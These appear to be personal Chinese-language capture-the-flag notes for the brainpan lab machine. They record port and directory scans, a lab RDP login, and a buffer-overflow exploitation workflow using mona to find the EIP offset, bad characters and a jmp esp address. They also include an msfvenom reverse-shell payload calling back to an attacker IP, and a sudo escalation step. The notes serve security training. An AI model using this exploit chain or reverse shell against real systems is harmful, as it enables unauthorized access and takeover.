nmap -sV -sC -Pn 10.10.25.220 > nmap.txt
nmap -p- 10.10.132.57 -T5 > nmapall.txt

gobuster dir  -u http://10.10.132.57:10000/  -w /usr/share/dirb/wordlists/common.txt -x txt,php,cgi > gobuster.txt

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.38.214 /workarea


10.10.38.214

1.nmap掃描出9999及10000
2. 10000端口查找到brainpan.exe
3. 發現600可以crash服務
4. 生成600長度字串
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
5. 查找準確EIP地址
!mona findmsp -distance 600
6.找到EIP是524
 Message=    EIP contains normal pattern : 0x35724134 (offset 524)
7.確認可以控制EIP 變成BBBB
8.檢測BadChars
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
!mona compare -f c:\mona\brainpan\bytearray.bin -a <address>
9.查找jmp esp地址
!mona jmp -r esp -cpb "\x00"
 Address=311712F3
 Message=  0x311712f3 : jmp esp |  {PAGE_EXECUTE_READ} [brainpan.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\brainpan.exe)
10.使用windows shell可以登入,但發現機器是linux系統,更改shell code
##注意因目標系統是32位元,所以要用x86以及用python,python要用_的,才能穩定連接
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.9.0.204 LPORT=4444  -b "\x00" -f python
11.登入後發現sudo -l 有權限執行util
sudo  /home/anansi/bin/anansi_util manual  /home/puck/root
12.上網搜索util提權